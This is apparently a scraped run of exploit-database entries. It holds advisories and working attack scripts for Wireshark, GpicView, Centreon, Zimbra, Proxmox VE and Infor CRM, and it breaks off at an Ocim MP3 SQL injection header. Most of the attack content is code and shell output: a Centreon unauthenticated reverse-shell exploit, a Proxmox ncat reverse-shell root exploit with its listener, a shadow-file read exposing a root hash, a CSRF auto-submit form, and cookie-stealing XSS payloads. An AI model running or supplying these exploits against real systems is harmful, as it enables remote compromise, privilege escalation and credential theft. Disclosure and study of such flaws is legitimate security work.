#1 0xc1fd8e in real_free wireshark/epan/tvbuff_real.c:47:3
#2 0xc2229c in tvb_free_internal wireshark/epan/tvbuff.c:110:3
#3 0xc22049 in tvb_free_chain wireshark/epan/tvbuff.c:135:3
#4 0xc21ed1 in tvb_free wireshark/epan/tvbuff.c:125:2
#5 0xbc972e in free_all_fragments wireshark/epan/reassemble.c:351:4
#6 0xbd40e5 in fragment_add_seq_common wireshark/epan/reassemble.c:1919:5
#7 0xbd4895 in fragment_add_seq_check_work wireshark/epan/reassemble.c:2006:12
#8 0xbd43a7 in fragment_add_seq_check wireshark/epan/reassemble.c:2050:9
#9 0x2fb8256 in dissect_mux27010 wireshark/epan/dissectors/packet-mux27010.c:949:28
#10 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#11 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#12 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#13 0x25dca12 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11
#14 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#15 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#16 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8
#17 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8
#18 0xadffde in dissect_record wireshark/epan/packet.c:501:3
#19 0xab6d0d in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2
#20 0x53c91b in process_packet wireshark/tshark.c:3728:5
#21 0x535d90 in load_cap_file wireshark/tshark.c:3484:11
#22 0x52c1df in main wireshark/tshark.c:2197:13
previously allocated by thread T0 here:
#0 0x4d6ff8 in __interceptor_malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40
#1 0x7ff6062f0610 in g_malloc (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4e610)
#2 0xbe1202 in fragment_add_seq_work wireshark/epan/reassemble.c:1793:2
#3 0xbd4181 in fragment_add_seq_common wireshark/epan/reassemble.c:1925:6
#4 0xbd4895 in fragment_add_seq_check_work wireshark/epan/reassemble.c:2006:12
#5 0xbd43a7 in fragment_add_seq_check wireshark/epan/reassemble.c:2050:9
#6 0x2fb8256 in dissect_mux27010 wireshark/epan/dissectors/packet-mux27010.c:949:28
#7 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#8 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#9 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#10 0x25dca12 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11
#11 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#12 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#13 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8
#14 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8
#15 0xadffde in dissect_record wireshark/epan/packet.c:501:3
#16 0xab6d0d in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2
#17 0x53c91b in process_packet wireshark/tshark.c:3728:5
#18 0x535d90 in load_cap_file wireshark/tshark.c:3484:11
#19 0x52c1df in main wireshark/tshark.c:2197:13
SUMMARY: AddressSanitizer: heap-use-after-free wireshark/epan/print.c:987:13 in print_hex_data_buffer
==14146==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11799. Attached are three files which trigger the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39503.zip
#!/usr/bin/python
# Exploit Title: GpicView Buffer Overflow DOS
# Date: 25th February 2016
# Exploit Author: David Silveiro (Xino.co.uk)
# Vendor Homepage: lxde.sourceforge.net/gpicview/
# Software Link: https://sourceforge.net/projects/lxde/files/GPicView%20%28image%20Viewer%29/0.2.x/
# Version: 0.2.5
# Tested on: Ubuntu 14 LTS
# CVE : 0 day
#Example: python POC.py [image-file]
from sys import argv
from subprocess import Popen
from shlex import split
from time import sleep
import shutil
def DOS(arg):
    # Receive the file name and construct the Popen argument list
    command = 'gpicview ' + arg[1]
    command_2 = split(command)
    # Open the file with GPicView
    Popen(command_2)
    print("Required: You have 15 seconds")
    print("to click on preferences, and ")
    print("check 'Auto Save Images' ")
    sleep(15)
    # Rename the image to a long name (the buffer)
    buffer = 'A' * 70 + '.png'
    shutil.move(arg[1], buffer)
def main():
print("Author: David Silveiro ")
print("Company: Xino.co.uk ")
print(" POC Gpicview DOS ")
DOS(argv)
print("File ready for overflow ")
print("Now simply rotate the image")
if __name__ == "__main__":
main()
Unauthenticated Remote Command Execution in Centreon Web Interface
==================================================================
Description
===========
Centreon is a popular monitoring solution.
A critical vulnerability has been found in the Centreon logging class
allowing remote users to execute arbitrary commands.
SQL injection leading to RCE
============================
Centreon logs SQL database errors to a log file using the "echo" system
command and the PHP exec() function. In the authentication class,
Centreon uses htmlentities with the ENT_QUOTES option to filter SQL
entities.
However, Centreon doesn't filter the SQL escape character "\" and it is
possible to generate an SQL Error.
Because of the use of the "echo" system command with the PHP exec()
function, and because of the lack of sanitization, it is possible to
inject arbitrary system commands.
**Access Vector**: remote
**Security Risk**: high
**Vulnerability**: CWE-78
----------------
Proof of Concept
----------------
TCP Reverse Shell using python.
#!/usr/bin/env python
import requests
import argparse

def shell(target, reverseip, reverseport):
    payload = 'import socket as a,subprocess as b,os as c;s=a.socket(2,1);s.connect(("%s",%d));d=s.fileno();c.dup2(d,0);c.dup2(d,1);c.dup2(d,2);p=b.call(["sh"]);' % (reverseip,reverseport)
    print "[~] Starting reverseshell : %s - port : %d" % (reverseip, reverseport)
    req = requests.post(target, data={"useralias": "$(echo %s | base64 -d | python)\\" % payload.encode("base64").replace("\n",""), "password": "foo"})
    print "[+] DEAD !"

if __name__ == "__main__":
    print "[~] Centreon Unauthentificated RCE - Nicolas Chatelain <n.chatelain@sysdream.com>"
    parser = argparse.ArgumentParser()
    parser.add_argument("--target", required=True)
    parser.add_argument("--reverseip", required=True)
    parser.add_argument("--reverseport", required=True, type=int)
    args = parser.parse_args()
    shell(args.target, args.reverseip, args.reverseport)
Shell :
nightlydev@nworkstation ~/Lab/Centreon $ python reverseshell.py
--target=http://172.16.138.137/centreon/index.php
--reverseip=172.16.138.1 --reverseport 8888
[~] Centreon Unauthentificated RCE - Nicolas Chatelain
<n.chatelain@sysdream.com>
[~] Starting reverseshell : 172.16.138.1 - port : 8888
# Other term
nightlydev@nworkstation ~/Lab/Centreon $ nc -lvp 8888
Ncat: Version 6.45 ( http://nmap.org/ncat )
Ncat: Listening on :::8888
Ncat: Listening on 0.0.0.0:8888
Ncat: Connection from 172.16.138.135.
Ncat: Connection from 172.16.138.135:50050.
whoami
apache
groups
apache centreon-engine centreon-broker centreon nagios
---------------
Vulnerable code
---------------
The vulnerable code is located in class/centreonLog.class.php, line 82
and line 154:
/*
* print Error in log file.
*/
exec("echo \"".$string."\" >> ".$this->errorType[$id]);
In class/centreonAuth.class.php, line 227:
$DBRESULT = $this->pearDB->query("SELECT * FROM `contact` WHERE
`contact_alias` = '" . htmlentities($username, ENT_QUOTES, "UTF-8") . "'
AND `contact_activate` = '1' AND `contact_register` = '1' LIMIT 1");
--------
Solution
--------
Update to the Centreon 2.5.4
Possible root password disclosure in centengine (Centreon Enterprise Server)
============================================================================
In some configurations, where centengine can be run as root (with sudo),
it is possible to read the content of arbitrary files.
**Access Vector**: local
**Security Risk**: high
**Vulnerability**: CWE-209
----------------
Proof of Concept
----------------
$ sudo /usr/sbin/centengine -v /etc/shadow
[1416391088] reading main config file
[1416391088] error while processing a config file: [/etc/shadow:1]
bad variable name:
'root:$6$3mvvEHQM3p3afuh4$DZ377daOy.8bn42t7ur82/Geplvsj90J7cs1xsgAbRZ0JDZ8KdB5CcQ0ucF5dwKpnBYLon1XBqjJPqpm6Zr5R0:16392:0:99999:7:::'
[1416391088]
---------------
Vulnerable code
---------------
In Centreon Enterprise Server (CES) : /etc/sudoers.d/centreon
CENTREON ALL = NOPASSWD: /usr/sbin/centengine -v *
--------
Solution
--------
Do not allow centengine to be run as root or do not disclose the line
that caused the error.
Timeline (dd/mm/yyyy)
=====================
* 18/11/2014 : Initial discovery
* 26/11/2014 : Contact with Centreon team
* 27/11/2014 : Centreon corrects the vulnerabilities
* 27/11/2014 : Centreon releases version 2.5.4, which fixes the vulnerabilities
Fixes
=====
* https://github.com/centreon/centreon/commit/a6dd914418dd185a698050349e05f10438fde2a9
* https://github.com/centreon/centreon/commit/d00f3e015d6cf64e45822629b00068116e90ae4d
* https://github.com/centreon/centreon/commit/015e875482d7ff6016edcca27bffe765c2bd77c1
Affected versions
=================
* Centreon <= 2.5.3
Credits
=======
* Nicolas CHATELAIN, Sysdream (n.chatelain -at- sysdream -dot- com)
======================================
Multiple CSRF in Zimbra Mail interface
======================================
CVE-2015-6541
Description
===========
Multiple CSRF vulnerabilities have been found in the Mail interface of
the Zimbra 8.0.9 GA Release, allowing an attacker to change account
preferences such as e-mail forwarding.
CSRF
====
Forms in the preferences part of old releases of Zimbra are vulnerable
to CSRF because of the lack of a CSRF token identifying a valid session.
As a consequence, requests can be forged and played arbitrarily.
**Access Vector**: remote
**Security Risk**: low
**Vulnerability**: CWE-352
**CVSS Base score**: 5.8
----------------
Proof of Concept
----------------
<html>
<body>
<form enctype="text/plain" id="trololo"
action="https://192.168.0.171/service/soap/BatchRequest" method="POST">
<input name='<soap:Envelope
xmlns:soap="http://www.w3.org/2003/05/soap-envelope"><soap:Header><context
xmlns="urn:zimbra"><userAgent xmlns="" name="ZimbraWebClient - FF38
(Win)" version="8.0.9_GA_6191"/><session xmlns="" id="19"/><account
xmlns="" by="name">anto@mail.ubuntu.fr</account><format xmlns=""
type="js"/></context></soap:Header><soap:Body><BatchRequest
xmlns="urn:zimbra" onerror="stop"><ModifyPrefsRequest
xmlns="urn:zimbraAccount" requestId="0"><pref xmlns=""
name="zimbraPrefMailForwardingAddress">itworks@ubuntu.fr</pref></ModifyPrefsRequest><a
xmlns="" n'
value='"sn">itworks</a></BatchRequest></soap:Body></soap:Envelope>'/>
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
Solution
========
Sensitive forms should be protected by a CSRF token.
Fixes
=====
Fixed with 8.5 release : bug 83547
(https://wiki.zimbra.com/wiki/Security/Collab/86#Notes_from_8.5)
Affected versions
=================
* Zimbra <= 8.0.9 GA Release
Credits
=======
* Anthony LAOU-HINE TSUEI, Sysdream (laouhine_anthony -at- hotmail
-dot- fr)
* Damien CAUQUIL, Sysdream (d.cauquil -at- sysdream -dot- com)
=====================================================================
Proxmox VE 3/4 Insecure Hostname Checking (Remote Root Exploit, XSS,
Privileges escalation)
=====================================================================
Description
===========
Proxmox is a popular virtualization solution based on KVM and Linux
containers.
A critical vulnerability has been found in Proxmox VE 3 (OpenVZ) and
Proxmox VE 4 beta 1 (LXC) in the virtual machine creation form,
allowing authenticated remote users to overwrite configuration file
settings.
Configuration file overwriting
==============================
Because the Proxmox VE application doesn't check the
user-provided "hostname" POST parameter, it's
possible to overwrite configuration files using a CRLF injection.
In Proxmox VE 3, we successfully gained access to the host filesystem
from a container and elevated our container capabilities, allowing us to
obtain user credentials and sniff the network.
In Proxmox VE 4b1, because LXC allows "hooks" to execute commands, we
successfully gained root privileges on the host.
It's also possible to exploit Proxmox clusters.
**Access Vector**: remote
**Security Risk**: high
**Vulnerability**: CWE-915
Proof of Concept
----------------
The following exploit works for Proxmox VE 4 beta 1. The
lxc.hook.pre-start configuration variable is used to trigger the ncat
reverse-shell payload when the container is started.
#!/usr/bin/env python
import requests
import socket
import telnetlib
from threading import Thread
import argparse
from time import sleep

def exploit(target, username, password, vmid, template, realm, reverse, hostname):
    payload = "ncat %s %s -e /bin/sh" % reverse
    print "[~] Obtaining authorization key..."
    apireq = requests.post("https://%s/api2/extjs/access/ticket" % target,
                           verify=False,
                           data={"username": username,
                                 "password": password,
                                 "realm": realm})
    response = apireq.json()
    if "success" in response and response["success"]:
        print "[+] Authentication success."
        ticket = response["data"]["ticket"]
        csrfticket = response["data"]["CSRFPreventionToken"]
        createvm = requests.post("https://%s/api2/extjs/nodes/%s/lxc" % (target, hostname),
                                 verify=False,
                                 headers={"CSRFPreventionToken": csrfticket},
                                 cookies={"PVEAuthCookie": ticket},
                                 data={"vmid": vmid,
                                       "hostname": "sysdream\nlxc.hook.pre-start=%s &&" % payload,
                                       "storage": "local",
                                       "password": "sysdream",
                                       "ostemplate": template,
                                       "memory": 512,
                                       "swap": 512,
                                       "disk": 2,
                                       "cpulimit": 1,
                                       "cpuunits": 1024,
                                       "net0": "name=eth0"})
        if createvm.status_code == 200:
            response = createvm.json()
            if "success" in response and response["success"]:
                print "[+] Container Created... (Sleeping 20 seconds)"
                sleep(20)
                print "[+] Starting container..."
                startcontainer = requests.post("https://%s/api2/extjs/nodes/%s/lxc/%s/status/start" % (target, hostname, vmid),
                                               verify=False,
                                               headers={"CSRFPreventionToken": csrfticket},
                                               cookies={"PVEAuthCookie": ticket})
                if startcontainer.status_code == 200:
                    response = startcontainer.json()
                    if "success" in response and response["success"]:
                        print "[+] Exploit should be working..."
                else:
                    print "[!] Can't start container ! Try to start it manually."
            else:
                print "[!] Error creating container..."
                print response
        else:
            print "[!] Error creating Container. Bad HTTP Status code : %d" % createvm.status_code
    else:
        print "[!] Authentication failed - Check the credentials..."

def handler(lport):
    print "[~] Starting handler on port %d" % lport
    t = telnetlib.Telnet()
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("0.0.0.0", lport))
    s.listen(1)
    conn, addr = s.accept()
    print "[+] Connection from %s" % addr[0]
    t.sock = conn
    print "[+] Pop the shell ! :)"
    t.interact()

if __name__ == "__main__":
    print "[~] Proxmox VE 4.0b1 Authenticated Root Exploit - Nicolas Chatelain <n.chatelain[at]sysdream.com>\n"
    parser = argparse.ArgumentParser()
    parser.add_argument("--target", required=True, help="The target host (eg : 10.0.0.1:8006)")
    parser.add_argument("--username", required=True)
    parser.add_argument("--password", required=True)
    parser.add_argument("--localhost", required=True, help="Local host IP for the connect-back shell.")
    parser.add_argument("--localport", required=True, type=int, help="Local port for local bind handler")
    parser.add_argument("--vmid", required=False, default="999", type=int, help="A unique ID for the container, exploit will fail if the ID already exists.")
    parser.add_argument("--template", required=False, default="local:vztmpl/debian-7.0-standard_7.0-2_i386.tar.gz", help="An existing template in the hypervisor (default : local:vztmpl/debian-7.0-standard_7.0-2_i386.tar.gz)")
    parser.add_argument("--realm", required=False, default="pam", choices=["pve", "pam"])
    parser.add_argument("--hostname", required=True, help="The target hostname")
    args = parser.parse_args()
    handlerthr = Thread(target=handler, args=(args.localport,))
    handlerthr.start()
    exploitthr = Thread(target=exploit, args=(args.target, args.username, args.password, args.vmid, args.template, args.realm, (args.localhost, args.localport), args.hostname))
    exploitthr.start()
    handlerthr.join()
Shell output :
nightlydev@nworkstation ~/Lab/Proxmox_Exploits $ python
remoteroot.py --target 10.25.0.101:8006 --username nicolas --password
pveuser --localhost 10.25.0.10 --localport 9999 --vmid 456 --realm pve
--hostname pve4
[~] Proxmox VE 4.0b1 Authenticated Root Exploit - Nicolas Chatelain
<n.chatelain[at]sysdream.com>
[~] Starting handler on port 9999
[~] Obtaining authorization key...
[+] Authentication success.
[+] Container Created... (Sleeping 20 seconds)
[+] Exploit should be working...
[+] Connection from 10.25.0.101
[+] Pop the shell !
whoami
root
id
uid=0(root) gid=0(root) groups=0(root)
The following exploit works for Proxmox VE 3. This proof of concept
mounts the host's /dev/dm-0 inside the container and adds multiple
capabilities to the container.
#!/usr/bin/env python
import requests
import socket
import telnetlib
from threading import Thread
import argparse

def exploit(target, username, password, vmid, template, realm, hostname):
    payload = "sysdream\"\nDEVNODES=\"dm-0:r \"\nCAPABILITIES=\"mknod:on, sys_chroot:on, sys_rawio: on, net_admin:on, dac_override:on\"\n#"
    print "[~] Obtaining authorization key..."
    apireq = requests.post("https://%s/api2/extjs/access/ticket" % target,
                           verify=False,
                           data={"username": username,
                                 "password": password,
                                 "realm": realm})
    response = apireq.json()
    if "success" in response and response["success"]:
        print "[+] Authentication success."
        ticket = response["data"]["ticket"]
        csrfticket = response["data"]["CSRFPreventionToken"]
        createvm = requests.post("https://%s/api2/extjs/nodes/%s/openvz" % (target, hostname),
                                 verify=False,
                                 headers={"CSRFPreventionToken": csrfticket},
                                 cookies={"PVEAuthCookie": ticket},
                                 data={"vmid": vmid,
                                       "hostname": payload,
                                       "storage": "local",
                                       "password": "sysdream",
                                       "ostemplate": template,
                                       "memory": 512,
                                       "swap": 512,
                                       "disk": 2,
                                       "cpus": 1,
                                       "netif": "ifname=eth0,bridge=vmbr0"})
        if createvm.status_code == 200:
            response = createvm.json()
            if "success" in response and response["success"]:
                print "[+] Countainer (Capabilities + DM-0 Mount) Created."
            else:
                print "[!] Error creating container..."
                print response
        else:
            print "[!] Error creating Container. Bad HTTP Status code : %d" % createvm.status_code
    else:
        print "[!] Authentication failed - Check the credentials..."

if __name__ == "__main__":
    print "[~] Proxmox VE 3 Authenticated Privileges Escalation Exploit - Nicolas Chatelain <n.chatelain[at]sysdream.com>\n"
    parser = argparse.ArgumentParser()
    parser.add_argument("--target", required=True, help="The target host (eg : 10.0.0.1:8006)")
    parser.add_argument("--username", required=True)
    parser.add_argument("--password", required=True)
    parser.add_argument("--vmid", required=False, default="999", type=int, help="A unique ID for the container, exploit will fail if the ID already exists.")
    parser.add_argument("--template", required=False, default="local:vztmpl/debian-7.0-standard_7.0-2_i386.tar.gz", help="An existing template in the hypervisor (default : local:vztmpl/debian-7.0-standard_7.0-2_i386.tar.gz)")
    parser.add_argument("--hostname", required=True, help="The target hostname")
    parser.add_argument("--realm", required=False, default="pam", choices=["pve", "pam"])
    args = parser.parse_args()
    exploit(args.target, args.username, args.password, args.vmid, args.template, args.realm, args.hostname)
Shell output :
nightlydev@nworkstation ~/Lab/Proxmox_Exploits $ python
privescalation.py --username root --password sysofdream --vmid 123
--realm pam --target 10.25.0.110:8006 --hostname pve3
[~] Proxmox VE 3 Authenticated Privileges Escalation Exploit -
Nicolas Chatelain <n.chatelain[at]sysdream.com>
[~] Obtaining authorization key...
[+] Authentication success.
[+] Countainer (Capabilities + DM-0 Mount) Created.
-- On container :
root@sysdream:/# ls -lah /dev/dm-0
brw-r----T 1 root root 253, 0 Aug 23 00:33 /dev/dm-0
---
Stored Cross-Site Scripting
===========================
Same vulnerability, different usage. Works on Proxmox 3 and Proxmox 4b1.
**Access Vector**: remote
**Security Risk**: high
Proof of Concept
----------------
The following exploit will create a stored XSS displaying the user
cookies and the PVE CSRFPreventionToken.
#!/usr/bin/env python
import requests
import socket
import telnetlib
from threading import Thread
import argparse

def exploit(target, username, password, vmid, template, realm, version, hostname):
    payload = "eval(String.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,43,34,45,34,32,43,32,80,86,69,46,67,83,82,70,80,114,101,118,101,110,116,105,111,110,84,111,107,101,110,41,59))"
    print "[~] Obtaining authorization key..."
    apireq = requests.post("https://%s/api2/extjs/access/ticket" % target,
                           verify=False,
                           data={"username": username,
                                 "password": password,
                                 "realm": realm})
    response = apireq.json()
    if "success" in response and response["success"]:
        print "[+] Authentication success."
        ticket = response["data"]["ticket"]
        csrfticket = response["data"]["CSRFPreventionToken"]
        if version == "4":
            createvm = requests.post("https://%s/api2/extjs/nodes/%s/lxc" % (target, hostname),
                                     verify=False,
                                     headers={"CSRFPreventionToken": csrfticket},
                                     cookies={"PVEAuthCookie": ticket},
                                     data={"vmid": vmid,
                                           "hostname": "<img/src='x'/onerror=%s>" % payload,
                                           "storage": "local",
                                           "password": "sysdream",
                                           "ostemplate": template,
                                           "memory": 512,
                                           "swap": 512,
                                           "disk": 2,
                                           "cpulimit": 1,
                                           "cpuunits": 1024,
                                           "net0": "name=eth0"})
        elif version == "3":
            createvm = requests.post("https://%s/api2/extjs/nodes/%s/openvz" % (target, hostname),
                                     verify=False,
                                     headers={"CSRFPreventionToken": csrfticket},
                                     cookies={"PVEAuthCookie": ticket},
                                     data={"vmid": vmid,
                                           "hostname": "<img/src='x'/onerror=%s>" % payload,
                                           "storage": "local",
                                           "password": "sysdream",
                                           "ostemplate": template,
                                           "memory": 512,
                                           "swap": 512,
                                           "disk": 2,
                                           "cpus": 1,
                                           "netif": "ifname=eth0,bridge=vmbr0"})
        if createvm.status_code == 200:
            response = createvm.json()
            if "success" in response and response["success"]:
                print "[+] Stored XSS Created."
            else:
                print "[!] Error creating container..."
                print response
        else:
            print "[!] Error creating Container. Bad HTTP Status code : %d" % createvm.status_code
    else:
        print "[!] Authentication failed - Check the credentials..."

if __name__ == "__main__":
    print "[~] Proxmox VE 3/4b1 Stored Cross Site Scripting - Nicolas Chatelain <n.chatelain[at]sysdream.com>\n"
    parser = argparse.ArgumentParser()
    parser.add_argument("--target", required=True, help="The target host (eg : 10.0.0.1:8006)")
    parser.add_argument("--username", required=True)
    parser.add_argument("--password", required=True)
    parser.add_argument("--vmid", required=False, default="999", type=int, help="A unique ID for the container, exploit will fail if the ID already exists.")
    parser.add_argument("--template", required=False, default="local:vztmpl/debian-7.0-standard_7.0-2_i386.tar.gz", help="An existing template in the hypervisor (default : local:vztmpl/debian-7.0-standard_7.0-2_i386.tar.gz)")
    parser.add_argument("--realm", required=False, default="pam", choices=["pve", "pam"])
    parser.add_argument("--version", default="3", choices=["3", "4"], help="The Proxmox version to exploit")
    parser.add_argument("--hostname", required=True, help="The target hostname")
    args = parser.parse_args()
    exploit(args.target, args.username, args.password, args.vmid, args.template, args.realm, args.version, args.hostname)
---------------
Vulnerable code
---------------
The vulnerable code is located in the /usr/share/perl5/PVE/LXC.pm for
Proxmox 4.
For Proxmox 3, the vulnerable code is located in
/usr/share/perl5/PVE/OpenVZ.pm.
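An added example (not Proxmox code) covering the root cause shared by the configuration overwrite and the stored XSS above: a naive config writer shows how a newline inside the "hostname" value becomes a new directive, and a strict allow-list validator rejects both the CRLF and the HTML payload shapes. The "key: value" file format and the hook path are assumed samples, not Proxmox's real serializer.

```python
# Added example: CRLF injection through an unvalidated hostname, and the check.
import re

# One DNS label: 1-63 letters, digits or hyphens, no leading or trailing
# hyphen (RFC 1123 style).  Newlines, quotes, '<', '=' and spaces all fail.
_LABEL = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)$")


def render_container_config(vmid, hostname, memory=512):
    """Naive config writer in a simplified 'key: value' format (assumed):
    a newline inside the hostname value simply starts a new line, which the
    reader then treats as a new directive."""
    return "".join(["hostname: %s\n" % hostname,
                    "memory: %d\n" % memory,
                    "vmid: %s\n" % vmid])


def parse_container_config(text):
    """Read the config back, splitting each line on its first ':' or '='.
    Returns an ordered list of (key, value) pairs."""
    pairs = []
    for line in text.splitlines():
        if not line.strip():
            continue
        m = re.match(r"^([^:=]+)[:=]\s*(.*)$", line)
        if m:
            pairs.append((m.group(1).strip(), m.group(2).strip()))
    return pairs


def validate_hostname(hostname):
    """Strict allow-list check to apply before the value reaches a config
    file or an HTML page.  Returns the hostname or raises ValueError."""
    if not hostname or len(hostname) > 253:
        raise ValueError("hostname length out of range")
    for label in hostname.split("."):
        if not _LABEL.match(label):
            raise ValueError("invalid hostname label: %r" % label)
    return hostname


def is_valid_hostname(hostname):
    """Boolean wrapper around validate_hostname for use in request handlers."""
    try:
        validate_hostname(hostname)
    except ValueError:
        return False
    return True


if __name__ == "__main__":
    # Constructed sample: a benign hook path with the same shape as the
    # advisory's hostname parameter.
    injected = "sysdream\nlxc.hook.pre-start=/tmp/hook.sh"
    print(parse_container_config(render_container_config(456, injected)))
    for candidate in ("pve4", "web-01.example", injected,
                      "<img/src='x'/onerror=alert(1)>"):
        print("%r valid: %s" % (candidate, is_valid_hostname(candidate)))
```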
--------
Solution
--------
Proxmox 4 : Update to pve-container 0.9-22
Proxmox 3 : Update to pve-manager 3.4-10
Timeline (dd/mm/yyyy)
=====================
04/09/2015 : Initial discovery.
17/09/2015 : Contact with proxmox team.
18/09/2015 : Proxmox fixes the vulnerabilities.
18/09/2015 : Proxmox releases a new pve-container version (0.9-22)
18/09/2015 : Proxmox releases a new pve-manager version (3.4-10)
Affected versions
=================
* Proxmox VE 4
* Proxmox VE 3
Credits
=======
* Nicolas CHATELAIN, Sysdream (n.chatelain -at- sysdream -dot- com)
Infor CRM 8.2.0.1136 Multiple HTML Script Injection Vulnerabilities
Vendor: Infor
Product web page: http://www.infor.com
Affected version: 8.2.0.1136
Summary: Infor® CRM, formerly Saleslogix, is an award-winning
customer relationship management (CRM) solution that provides
a complete view of customer interactions, so your business can
collaborate and respond promptly and knowledgably to customer
inquiries, sales opportunities, and service requests. Infor CRM
includes a robust suite of sales, marketing, and service capabilities,
to offer businesses of all sizes a fast, flexible, and affordable
solution for finding, winning, and growing profitable customer
relationships.
Desc: Infor CRM suffers from multiple stored cross-site scripting
vulnerabilities. Input passed to several POST/PUT parameters in
JSON format is not properly sanitised before being returned to the
user. This can be exploited to execute arbitrary HTML and script
code in a user's browser session in the context of an affected site.
Tested on: Microsoft-IIS/8.5
ASP.NET/4.0.30319
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5308
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5308.php
21.01.2016
---
----------------------------------
Affected parameter(s): description
----------------------------------
PUT /SLXClient/slxdata.ashx/slx/system/-/attachments(%22eUSERA0004IX%22)?_includeFile=false&format=json&_t=1456358980947 HTTP/1.1
Host: intranet.zeroscience.mk
{$updated: "/Date(1456359095000)/", $key: "eUSERA0004IX",…}
"": ""
$descriptor: ""
$etag: "+CgjMLB+0nA="
$httpStatus: 200
$key: "eUSERA0004IX"
$lookup: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/attachments?format=json"
$post: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/attachments?format=json"
$schema: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/attachments/$schema?format=json"
$service: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/attachments/$service?format=json"
$template: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/attachments/$template?format=json"
$updated: "/Date(1456359095000)/"
$url: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/attachments('eUSERA0004IX')"
accountId: null
activityId: null
attachDate: "2016-01-25T00:09:39Z"
contactId: null
contractId: null
createDate: "/Date(1456359095000)/"
createUser: "UUSERA0005W0"
dataType: "R"
defectId: null
description: "<img src=j onerror=confirm(document.cookie) >"
details: {createSource: null}
documentType: null
fileExists: true
fileName: "inforcrm_xss.png"
fileSize: 101722
historyId: null
leadId: null
modifyDate: "/Date(1456359095000)/"
modifyUser: "UUSERA0005W0"
opportunityId: null
physicalFileName: "!eUSERA0004IXinforcrm_xss.png"
productId: null
remoteStatus: null
returnId: null
salesOrderId: null
ticketId: null
url: null
user: {$key: "UUSERA0005W0"}
-----------------------------------------------------------
Affected parameter(s): Description, Location, and LongNotes
-----------------------------------------------------------
POST /SLXClient/slxdata.ashx/slx/system/-/activities?format=json&_t=1456357736977 HTTP/1.1
Host: intranet.zeroscience.mk
{$httpStatus: 200, $descriptor: "", ActivityBasedOn: null, Alarm: false,…}
$descriptor: ""
$httpStatus: 200
AccountId: null
AccountName: null
ActivityAttendees: {}
ActivityBasedOn: null
Alarm: false
AlarmTime: "2016-01-24T22:45:00Z"
AllowAdd: true
AllowComplete: true
AllowDelete: true
AllowEdit: true
AllowSync: true
AppId: null
Attachment: false
AttachmentCount: null
AttendeeCount: 0
Category: "Pleasantville"
ContactId: null
ContactName: null
CreateDate: "/Date(-62135596800000)/"
CreateUser: null
Description: "<img src=zsl onerror=prompt(1) >"
Details: {ForeignId1: null, ForeignId2: null, ForeignId3: null, ForeignId4: null, ProjectId: null,…}
ChangeKey: null
CreateSource: null
ForeignId1: null
ForeignId2: null
ForeignId3: null
ForeignId4: null
GlobalSyncId: null
ProjectId: null
Tick: null
UserDef1: null
UserDef2: null
UserDef3: null
Duration: "0"
EndDate: "/Date(1456359315286)/"
LeadId: null
LeadName: null
Leader: {$key: "UUSERA0005W0", $descriptor: "Userovich, User"}
$descriptor: "Userovich, User"
$key: "UUSERA0005W0"
Location: "<img src=zsl onerror=prompt(2) >"
LongNotes: "<img src=zsl onerror=prompt(3) >"
ModifyDate: "/Date(-62135596800000)/"
ModifyUser: null
Notes: "Zero Science Lab"
OpportunityId: null
OpportunityName: null
OriginalDate: "/Date(1456358415286)/"
PhoneNumber: null
Priority: "1"
ProcessId: null
ProcessNode: null
RecurIterations: 0
RecurPeriod: 0
RecurPeriodSpec: 0
RecurSkip: null
RecurrenceState: "rsNotRecurring"
Recurring: false
Resources: {}
Rollover: false
StartDate: "2016-01-25T00:00:05Z"
TicketId: null
TicketNumber: null
Timeless: true
Type: "atToDo"
UserActivities: {}
$url: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/userActivities?format=json&where=Activity.Id%20eq%20%27VUSERA000CZ7%27"
UserNotifications: {}
$url: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/userNotifications?format=json&where=Activity.Id%20eq%20%27VUSERA000CZ7%27"
========
Ocim MP3 Plugin SQL Injection Vulnerability
========
:----------------------------------------------------------------------------------------------------:
: # Exploit Title : Ocim MP3 Plugin SQL Injection Vulnerability
: # Date : 26 February 2016
: # Author : xevil and Blankon33
: # Vendor Site: http://www.ocimscripts.com/
: # Version:
: # Vulnerability : SQL Injection
: # Tested on : Wordpress 4.4.2
